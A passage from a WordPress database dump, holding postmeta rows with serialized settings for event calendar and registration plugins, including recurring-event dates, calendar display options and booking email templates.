"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135885,264220,'_EventEndDate','2021-04-19 20:00:00'),(135894,264220,'_EventTimezoneAbbr','MDT'),(135863,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135884,264220,'_EventStartDate','2021-04-19 19:00:00'),(135895,264220,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(135864,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135883,264220,'_EventShowMap',''),(135896,264220,'_RTECregistrationsDisabled','1'),(135865,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135882,264220,'_EventShowMapLink',''),(135897,264220,'_RTECdeadlineType','start'),(135866,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135881,264220,'boldgrid_hide_page_title','0'),(135898,264220,'_RTECwhoCanRegister','any'),(135867,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135869,264220,'_EventOrigin','events-calendar'),(135870,264220,'_EventOrigin','events-calendar'),(135871,264220,'_EventOrigin','events-calendar'),(135872,264220,'_EventOrigin','events-calendar'),(135873,264220,'_EventOrigin','events-calendar'),(135874,264220,'_EventOrigin','events-calendar'),(135875,264220,'_EventOrigin','events-calendar'),(135876,264220,'_EventOrigin','events-calendar'),(135877,264220,'_EventOrigin','events-calendar'),(135878,264220,'_EventOrigin','events-calendar'),(135879,264220,'_EventOrigin','events-calendar'),(135880,264220,'_thumbnail_id','264210'),(135868,264220,'_EventOrigin','events-calendar'),(135899,264220,'_RTEClimitRegistrations','0'),(135900,264220,'_RTECmaxRegistrations','30'),(135901,264220,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(135902,264220,'_RTECnumRegistered','0'),(135903,264220,'_EventVenueID','262435'),(135905,264220,'_dp_original','264209'),(135906,264220,'_edit_lock','1616353129:2'),(135907,264220,'_edit_last','2'),(142787,265063,'mec_repeat_end_at_date',''),(142786,265063,'mec_repeat_end_at_occurrences','11'),(142785,265063,'mec_repeat_end','occurrences'),(142784,265063,'mec_repeat_interval','1'),(142783,265063,'mec_repeat_type','advanced'),(142782,265063,'mec_repeat_status','1'),(142781,265063,'mec_end_day_seconds','41400'),(142780,265063,'mec_end_time_ampm','AM'),(142779,265063,'mec_end_time_minutes','30'),(142778,265063,'mec_end_time_hour','11'),(142777,265063,'mec_end_date','2021-08-22'),(142776,265063,'mec_start_day_seconds','37800'),(142775,265063,'mec_start_time_ampm','AM'),(142774,265063,'mec_start_time_minutes','30'),(142768,265063,'mec_comment',''),(142769,265063,'mec_timezone','global'),(142770,265063,'mec_countdown_method','global'),(142771,265063,'mec_public','1'),(142772,265063,'mec_start_date','2021-08-22'),(142773,265063,'mec_start_time_hour','10'),(142767,265063,'mec_hide_end_time','0'),(142766,265063,'mec_hide_time','0'),(142764,265063,'mec_allday','0'),(142765,265063,'one_occurrence','0'),(142808,265063,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(142807,265063,'boldgrid_hide_page_title','0'),(142806,265063,'mec_display_cancellation_reason_in_single_page',''),(142805,265063,'mec_cancelled_reason',''),(142804,265063,'mec_moved_online_link',''),(142803,265063,'mec_event_status','EventScheduled'),(142802,265063,'mec_fields','a:0:{}'),(142801,265063,'mec_op','a:0:{}'),(142800,265063,'mec_bfixed_fields','a:0:{}'),(142799,265063,'mec_reg_fields','a:0:{}'),(142794,265063,'mec_fees_global_inheritance','1'),(142795,265063,'mec_fees','a:0:{}'),(142796,265063,'mec_ticket_variations_global_inheritance','1'),(142797,265063,'mec_ticket_variations','a:0:{}'),(142798,265063,'mec_reg_fields_global_inheritance','1'),(142793,265063,'mec_tickets','a:0:{}'),(142812,265064,'_wp_attached_file','2021/05/Autobiography-of-a-Modern-Prophet.jpg'),(142811,265063,'passster_protection_type','password'),(142810,265063,'passster_activate_protection',NULL),(142809,265063,'passster_activate_global_protection',NULL),(142762,265063,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(142761,265063,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(142760,265063,'mec_additional_location_ids','a:0:{}'),(142759,265063,'mec_additional_organizer_ids','a:0:{}'),(142758,265063,'mec_currency','a:0:{}'),(142752,265063,'mec_organizer_id','0'),(142753,265063,'mec_read_more',''),(142754,265063,'mec_more_info',''),(142755,265063,'mec_more_info_title',''),(142756,265063,'mec_more_info_target','_self'),(142757,265063,'mec_cost',''),(142751,265063,'mec_dont_show_map','0'),(136051,264229,'protect_children',''),(136052,264229,'label',''),(136053,264229,'category',''),(136054,264229,'location',''),(136055,264229,'organizer',''),(136056,264229,'tag',''),(136057,264229,'author',''),(136058,264229,'skin','monthly_view'),(136059,264229,'show_past_events','1'),(136060,264229,'sk-options','a:18:{s:4:\"list\";a:29:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:24:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:7:\"monthly\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:14:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264228\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(136061,264229,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\"